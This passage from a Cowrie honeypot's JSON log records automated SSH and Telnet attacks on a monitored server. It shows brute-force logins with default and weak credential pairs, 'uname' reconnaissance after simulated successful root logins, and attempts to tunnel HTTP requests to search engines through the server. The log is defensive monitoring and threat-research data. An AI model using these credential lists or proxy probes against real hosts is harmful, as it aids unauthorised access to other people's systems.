],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:24.227345Z","src_ip":"212.227.235.229","session":"3b82021bb665"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:24.310851Z","src_ip":"212.227.235.229","session":"34e6161665ba"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:24.664954Z","src_ip":"212.227.235.229","session":"3b82021bb665"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:25.457417Z","src_ip":"212.227.235.229","session":"34e6161665ba"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:25.811677Z","src_ip":"212.227.235.229","session":"3b82021bb665"}
{"eventid":"cowrie.session.closed","duration":31.625916004180908,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:29.715626Z","src_ip":"212.227.235.229","session":"3c304cc1f644"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41314,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7367ee0bae4","protocol":"ssh","message":"New connection: 212.227.125.160:41314 (1.2.3.4:22) [session: b7367ee0bae4]","sensor":"my-vps","timestamp":"2025-08-28T05:57:31.049223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:31.203682Z","src_ip":"212.227.125.160","session":"b7367ee0bae4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:31.204404Z","src_ip":"212.227.125.160","session":"b7367ee0bae4"}
{"eventid":"cowrie.session.closed","duration":31.251325845718384,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:31.532644Z","src_ip":"8.222.212.69","session":"e7a49e4c404b"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:32.740512Z","src_ip":"212.227.125.160","session":"b7367ee0bae4"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:33.849826Z","src_ip":"212.227.125.160","session":"b7367ee0bae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59446,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b77c40f971e","protocol":"ssh","message":"New connection: 212.227.235.229:59446 (1.2.3.4:22) [session: 5b77c40f971e]","sensor":"my-vps","timestamp":"2025-08-28T05:57:42.129338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:42.130343Z","src_ip":"212.227.235.229","session":"5b77c40f971e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:42.274580Z","src_ip":"212.227.235.229","session":"5b77c40f971e"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:42.708996Z","src_ip":"212.227.235.229","session":"5b77c40f971e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:43.854903Z","src_ip":"212.227.235.229","session":"5b77c40f971e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54072,"dst_ip":"1.2.3.4","dst_port":22,"session":"e87ff0885295","protocol":"ssh","message":"New connection: 212.227.125.160:54072 (1.2.3.4:22) [session: e87ff0885295]","sensor":"my-vps","timestamp":"2025-08-28T05:57:49.678611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:49.679587Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:49.783921Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:57:50.203299Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:57:50.488949Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:57:50.489640Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:50.595637Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:50.596632Z","src_ip":"212.227.125.160","session":"e87ff0885295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53082,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b40bccd189","protocol":"ssh","message":"New connection: 212.227.235.229:53082 (1.2.3.4:22) [session: 95b40bccd189]","sensor":"my-vps","timestamp":"2025-08-28T05:57:54.927813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:54.928741Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:55.072746Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:57:55.526774Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:57:55.833064Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:57:55.833767Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:55.978989Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:55.980284Z","src_ip":"212.227.235.229","session":"95b40bccd189"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49402,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b133b4161b2","protocol":"ssh","message":"New connection: 212.227.125.160:49402 (1.2.3.4:22) [session: 5b133b4161b2]","sensor":"my-vps","timestamp":"2025-08-28T05:58:01.323669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:58:01.378899Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:58:01.460838Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:58:01.874255Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:58:02.195780Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:58:02.196470Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:02.303617Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:02.305181Z","src_ip":"212.227.125.160","session":"5b133b4161b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40728,"dst_ip":"1.2.3.4","dst_port":23,"session":"c176f32a2463","protocol":"telnet","message":"New connection: 212.227.235.229:40728 (1.2.3.4:23) [session: c176f32a2463]","sensor":"my-vps","timestamp":"2025-08-28T05:58:03.654260Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43116,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa928f600ef","protocol":"ssh","message":"New connection: 212.227.125.160:43116 (1.2.3.4:22) [session: dfa928f600ef]","sensor":"my-vps","timestamp":"2025-08-28T05:58:16.165576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:58:16.180423Z","src_ip":"212.227.125.160","session":"dfa928f600ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:58:16.277421Z","src_ip":"212.227.125.160","session":"dfa928f600ef"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:58:16.695358Z","src_ip":"212.227.125.160","session":"dfa928f600ef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:17.802943Z","src_ip":"212.227.125.160","session":"dfa928f600ef"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":2529,"dst_ip":"1.2.3.4","dst_port":22,"session":"55d5b46fd845","protocol":"ssh","message":"New connection: 185.246.128.133:2529 (1.2.3.4:22) [session: 55d5b46fd845]","sensor":"my-vps","timestamp":"2025-08-28T05:58:20.908202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-JSCH_0.1.48","message":"Remote SSH version: SSH-2.0-JSCH_0.1.48","sensor":"my-vps","timestamp":"2025-08-28T05:58:20.908904Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T05:58:20.953585Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:58:21.853501Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":5209,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:5209","sensor":"my-vps","timestamp":"2025-08-28T05:58:21.898884Z","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:21.943472Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":4884,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:4884","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.075139Z","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.119751Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"185.246.128.133","src_port":2651,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2651","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.250873Z","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.295524Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"185.246.128.133","src_port":15026,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15026","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.427047Z","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.472077Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"185.246.128.133","src_port":32180,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32180","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.603073Z","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.647755Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"185.246.128.133","src_port":22282,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22282","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.779066Z","session":"55d5b46fd845"}
